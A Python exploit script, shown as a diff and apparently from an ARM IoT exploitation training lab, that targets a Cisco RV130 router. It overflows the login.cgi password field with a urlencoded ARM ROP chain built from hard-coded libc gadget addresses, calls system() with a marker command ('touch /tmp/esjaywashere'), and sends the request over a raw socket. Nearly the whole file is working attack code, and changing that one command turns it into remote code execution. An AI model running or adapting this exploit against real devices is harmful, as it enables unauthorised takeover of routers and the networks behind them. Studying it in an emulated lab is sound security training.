| 1 | + | #!/usr/bin/python |
| 2 | + | # |
| 3 | + | # The ARM IoT Exploit Laboratory |
| 4 | + | # by Saumil Shah |
| 5 | + | # |
| 6 | + | # Exploit template for Cisco RV130 router |
| 7 | + | |
| 8 | + | import struct, sys, re, socket |
| 9 | + | |
| 10 | + | |
| 11 | + | ##### HELPER FUNCTIONS ##### |
| 12 | + | |
| 13 | + | def pack32(value): |
| 14 | + | return struct.pack("<I", value) # little byte order |
| 15 | + | |
| 16 | + | def pack16n(value): |
| 17 | + | return struct.pack(">H", value) # big/network byte order |
| 18 | + | |
| 19 | + | def urlencode(buf): |
| 20 | + | s = "" |
| 21 | + | for b in buf: |
| 22 | + | if re.match(r"[a-zA-Z0-9\/]", b) is None: |
| 23 | + | s += "%%%02X" % ord(b) |
| 24 | + | else: |
| 25 | + | s += b |
| 26 | + | return s |
| 27 | + | |
| 28 | + | ##### HELPER FUNCTIONS FOR ROP CHAINING ##### |
| 29 | + | |
| 30 | + | # function to create a libc gadget |
| 31 | + | # requires a global variable called libc_base |
| 32 | + | def libc(offset): |
| 33 | + | return pack32(libc_base + offset) |
| 34 | + | |
| 35 | + | # function to represent data on the stack |
| 36 | + | def data(data): |
| 37 | + | return pack32(data) |
| 38 | + | |
| 39 | + | # function to check for bad characters |
| 40 | + | # run this before sending out the payload |
| 41 | + | # e.g. detect_badchars(payload, "\x00\x0a\x0d/?") |
| 42 | + | def detect_badchars(string, badchars): |
| 43 | + | for badchar in badchars: |
| 44 | + | i = string.find(badchar) |
| 45 | + | while i != -1: |
| 46 | + | sys.stderr.write("[!] 0x%02x appears at position %d\n" % (ord(badchar), i)) |
| 47 | + | i = string.find(badchar, i+1) |
| 48 | + | |
| 49 | + | ##### MAIN ##### |
| 50 | + | if len(sys.argv) != 3: |
| 51 | + | print("Usage: expl.py <ip> <port>") |
| 52 | + | sys.exit(1) |
| 53 | + | |
| 54 | + | ip = sys.argv[1] |
| 55 | + | port = sys.argv[2] |
| 56 | + | |
| 57 | + | # $1 = {<text variable, no debug info>} 0x35849144 <system> |
| 58 | + | system = pack32(0x35849144) |
| 59 | + | |
| 60 | + | # 0x357fc000 0x35859000 0x00000000 r-x /emux/RV130/rootfs/lib/libc.so.0 |
| 61 | + | libc_base = 0x357fc000 |
| 62 | + | |
| 63 | + | """ |
| 64 | + | ROP Gadget Flow: |
| 65 | + | 1. Gadget |
| 66 | + | |
| 67 | + | # r5 -> system |
| 68 | + | # r6 -> next gadget |
| 69 | + | 0x00024278: mov r2, r5; blx r6; |
| 70 | + | |
| 71 | + | |
| 72 | + | 2. Gadget |
| 73 | + | # sp -> points to our command |
| 74 | + | # r2 is set with the previous gadget to point to system |
| 75 | + | 0x00041308: mov r0, sp; blx r2; |
| 76 | + | """ |
| 77 | + | |
| 78 | + | |
| 79 | + | """ |
| 80 | + | 0x00041308: mov r0, sp; blx r2; |
| 81 | + | """ |
| 82 | + | mov_r0_sp_blx_r2 = pack32(libc_base + 0x00041308) |
| 83 | + | |
| 84 | + | pattern = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM" |
| 85 | + | pattern += system |
| 86 | + | pattern += mov_r0_sp_blx_r2 |
| 87 | + | pattern += "PPPPQQQQRRRRSSSSTTTT" |
| 88 | + | |
| 89 | + | |
| 90 | + | buf = "A" * (446-len(pattern)) |
| 91 | + | buf += pattern |
| 92 | + | |
| 93 | + | rop = '' |
| 94 | + | |
| 95 | + | """ |
| 96 | + | 0x358494e8 <+36>: ldr r0, [sp, #4] |
| 97 | + | 0x358494ec <+40>: add sp, sp, #12 |
| 98 | + | 0x358494f0 <+44>: ldmfd sp!, {pc} |
| 99 | + | """ |
| 100 | + | ldr_r0 = pack32(0x358494e8) |
| 101 | + | |
| 102 | + | |
| 103 | + | # 0x00052620: pop {r2, r3}; bx lr; |
| 104 | + | pop_r2_r3_bx_lr = pack32(libc_base + 0x00052620) |
| 105 | + | |
| 106 | + | # THUMB: 0x00020e78 (0x00020e79): pop {r2, r6, pc}; |
| 107 | + | # doesn't seem to work using THUMB gadgets :( |
| 108 | + | #pop_r2_r6_pc = pack32(libc_base + 0x00020e78) |
| 109 | + | |
| 110 | + | #rop += ldr_r0 |
| 111 | + | #rop += pop_r2_r6_pc |
| 112 | + | |
| 113 | + | """ |
| 114 | + | # r5 -> system |
| 115 | + | # r6 -> next gadget |
| 116 | + | 0x00024278: mov r2, r5; blx r6; |
| 117 | + | """ |
| 118 | + | rop += pack32(libc_base + 0x00024278) |
| 119 | + | |
| 120 | + | rop += 'touch /tmp/esjaywashere;#' |
| 121 | + | |
| 122 | + | # Not relevant |
| 123 | + | rop += data(0x48484848) |
| 124 | + | rop += data(0x49494949) |
| 125 | + | rop += data(0x50505050) |
| 126 | + | |
| 127 | + | buf = buf + rop |
| 128 | + | buf += "F"*100 |
| 129 | + | |
| 130 | + | detect_badchars(buf, "\x00") |
| 131 | + | |
| 132 | + | pwd = urlencode(buf) |
| 133 | + | data = "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=%s&sel_lang=EN" % pwd |
| 134 | + | uri = "/login.cgi" |
| 135 | + | |
| 136 | + | request = "POST %s HTTP/1.0\n" % uri |
| 137 | + | request += "Host: 127.0.0.1\n" |
| 138 | + | request += "Content-Length: %s\n" % len(data) |
| 139 | + | request += "Content-Type: application/x-www-form-urlencoded\n\n" |
| 140 | + | request += "%s\n" % data |
| 141 | + | |
| 142 | + | |
| 143 | + | #print request, |
| 144 | + | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 145 | + | s.connect((ip, int(port))) |
| 146 | + | s.send(request) |
| 147 | + | |